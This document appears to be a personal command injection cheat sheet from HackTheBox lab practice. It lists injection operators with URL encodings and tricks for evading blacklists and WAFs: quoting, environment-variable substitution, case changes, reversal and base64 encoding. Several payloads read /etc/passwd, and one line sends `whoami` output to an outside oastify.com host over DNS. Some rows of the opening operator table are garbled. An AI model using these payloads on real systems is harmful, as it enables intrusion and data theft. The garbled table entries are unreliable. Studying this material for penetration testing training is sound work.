Command Injection

Injection Operator	Injection Character	URL-Encoded Character	Executed Command
Semicolon	;	%3b	Both
New Line	\	%0a	Both
Background	&	%26	Both (second output generally shown first)
Pipe	`	<<<`	%7c
AND	&&	%26%26	Both (only if first succeeds)
OR	`		`
Sub-Shell	````	%60%60	Both (Linux-only)
Sub-Shell	$()	%24%28%29	Both (Linux-only)
tabulador	\	%09	Linux-only
space	``	${IFS}	Linux-only

If the error message displayed a different page, with information like our IP and our request, this may indicate that it was denied by a WAF

Environment Variables

Linux	${IFS}	Commonly use to evade space
Linux	${PATH:0:1}	/
Linux	${LS_COLORS:10:1}	;
Windows	%HOMEPATH:~6,-11%	/
PowerShell	$env:HOMEPATH[0]	/

Bypassing Blacklisted Commands

#Linux
Intrusionz3r0@htb[/htb]$ w'h'o'am'i21y4d
Intrusionz3r0@htb[/htb]$ w"h"o"am"i
Intrusionz3r0@htb[/htb]$ who$@ami
Intrusionz3r0@htb[/htb]$ w\\ho\\am\\i
Intrusionz3r0@htb[/htb]$ {cat,/etc/passwd}

#Windows
C:\\htb> who^ami

Case manipulation

Linux is case-sensitive hance we have to get a bit creative and find a command that turns the command into an all-lowercase word.

#Windows
PS C:\\htb> WhOaMi
#Linux
Intrusionz3r0@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"cAt") /etc/passwd
Intrusionz3r0@htb[/htb]$ $(a="printENv";printf %s "${a,,}")

#Example
$(tr%09"[A-Z]"%09"[a-z]"<<<"cAt")${IFS}${PATH:0:1}etc${PATH:0:1}passwd

Reversing commands

#Get the word in reverse
Intrusionz3r0@htb[/htb]$ echo 'whoami' | rev
PS C:\\htb> "whoami"[-1..-20] -join ''
Output: imaohw

#Execute command
Intrusionz3r0@htb[/htb]$ $(rev<<<'imaohw')
PS C:\\htb> iex "$('imaohw'[-1..-20] -join '')"
Output: Intrusionz3r0

Encode Commands

Intrusionz3r0@htb[/htb]$ echo -n 'cat /etc/passwd | grep 33' | base64
output: Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw=

Intrusionz3r0@htb[/htb]$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
output: www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Intrusionz3r0@htb[/htb]$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64
PS C:\\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Output: dwBoAG8AYQBtAGkA

PS C:\\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Blind OS command injection with out-of-band data exfiltration

& nslookup `whoami`929y6u9dkdbxdod9zzkjvxf7vy1pplda.oastify.com #

Miscelaneous commands

Injection Type	Operators
SQL Injection	' , ; -- /* */
Command Injection	; &&
LDAP Injection	* ( ) & `
XPath Injection	' or and not substring concat count
OS Command Injection	; & `
Code Injection	' ; -- /* */ $() ${} #{} %{} ^
Directory Traversal/File Path Traversal	../ ..\\\\ %00
Object Injection	; & `
XQuery Injection	' ; -- /* */
Shellcode Injection	\\x \\u %u %n
Header Injection	\ \\r\ \ %0d %0a %09

Tools

https://github.com/Bashfuscator/Bashfuscator

https://github.com/danielbohannon/Invoke-DOSfuscation